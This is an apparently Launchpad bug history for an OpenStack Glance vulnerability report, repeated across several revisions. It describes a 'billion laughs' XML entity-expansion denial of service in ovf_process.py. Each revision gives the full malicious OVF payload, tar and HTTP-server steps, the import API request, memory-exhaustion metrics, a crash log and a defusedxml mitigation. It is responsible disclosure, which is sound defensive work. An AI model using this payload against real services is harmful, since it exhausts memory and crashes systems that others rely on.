2016-09-20 00:18:50.907 12743 DEBUG oslo_concurrency.processutils [-] Running cmd (subprocess): qemu-img info --output=json file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504 execute /usr/local/lib/python2.7/dist-packages/oslo_concurrency/processutils.py:344
2016-09-20 00:18:52.582 12743 DEBUG oslo_concurrency.processutils [-] CMD "qemu-img info --output=json file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504" returned: 0 in 1.676s execute /usr/local/lib/python2.7/dist-packages/oslo_concurrency/processutils.py:374
2016-09-20 00:18:52.633 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-ImportToFS-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (2f07c300-65b4-4dd5-a93a-87eaf8d388c6) transitioned into state 'SUCCESS' from state 'RUNNING' with result 'file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:178
2016-09-20 00:18:52.640 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-OVF_Process-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (da37d5f2-52bd-46ca-bfc4-13a0f926afd3) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:52.670 12743 WARNING glance.async.flows.ovf_process [-] OVF properties config file "ovf-metadata.json" was not found.
2016-09-20 00:19:08.116 12744 DEBUG eventlet.wsgi.server [-] (12744) accepted ('10.0.2.2', 51290) server /usr/local/lib/python2.7/dist-packages/eventlet/wsgi.py:868
2016-09-20 00:19:08.200 12744 DEBUG glance.api.middleware.version_negotiation [-] Determining version of request: POST /v2/tasks Accept: application/json process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:46
2016-09-20 00:19:08.203 12744 DEBUG glance.api.middleware.version_negotiation [-] Using url versioning process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:58
2016-09-20 00:19:08.206 12744 DEBUG glance.api.middleware.version_negotiation [-] Matched version: v2 process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:70
2016-09-20 00:19:08.208 12744 DEBUG glance.api.middleware.version_negotiation [-] new path /v2/tasks process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:71
2016-09-20 00:19:09.610 11832 INFO glance.common.wsgi [-] Removed dead child 12744
2016-09-20 00:19:09.661 11832 DEBUG glance.common.wsgi [-] No stale children _verify_and_respawn_children /opt/stack/glance/glance/common/wsgi.py:548
2016-09-20 00:19:09.681 11832 CRITICAL glance [-] OSError: [Errno 12] Cannot allocate memory
2016-09-20 00:19:09.681 11832 ERROR glance Traceback (most recent call last):
2016-09-20 00:19:09.681 11832 ERROR glance File "/usr/local/bin/glance-api", line 10, in <module>
2016-09-20 00:19:09.681 11832 ERROR glance sys.exit(main())
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/cmd/api.py", line 92, in main
2016-09-20 00:19:09.681 11832 ERROR glance server.wait()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 626, in wait
2016-09-20 00:19:09.681 11832 ERROR glance self.wait_on_children()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 566, in wait_on_children
2016-09-20 00:19:09.681 11832 ERROR glance self._verify_and_respawn_children(pid, status)
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 558, in _verify_and_respawn_children
2016-09-20 00:19:09.681 11832 ERROR glance self.run_child()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 639, in run_child
2016-09-20 00:19:09.681 11832 ERROR glance pid = os.fork()
2016-09-20 00:19:09.681 11832 ERROR glance OSError: [Errno 12] Cannot allocate memory
2016-09-20 00:19:09.681 11832 ERROR glance
g-api failed to start
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [4]
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). |
Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3]
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4]
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5]
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). |
|
2016-09-20 00:31:32 |
Charles Neill |
description |
Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3]
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4]
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5]
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). |
Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3]
Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder.
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4]
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5]
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). |
|
2016-09-20 01:03:41 |
Tristan Cacqueray |
bug task added |
|
ossa |
|
2016-09-20 01:04:10 |
Tristan Cacqueray |
description |
Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3]
Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder.
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4]
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5]
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). |
This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments.
Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3]
Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder.
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
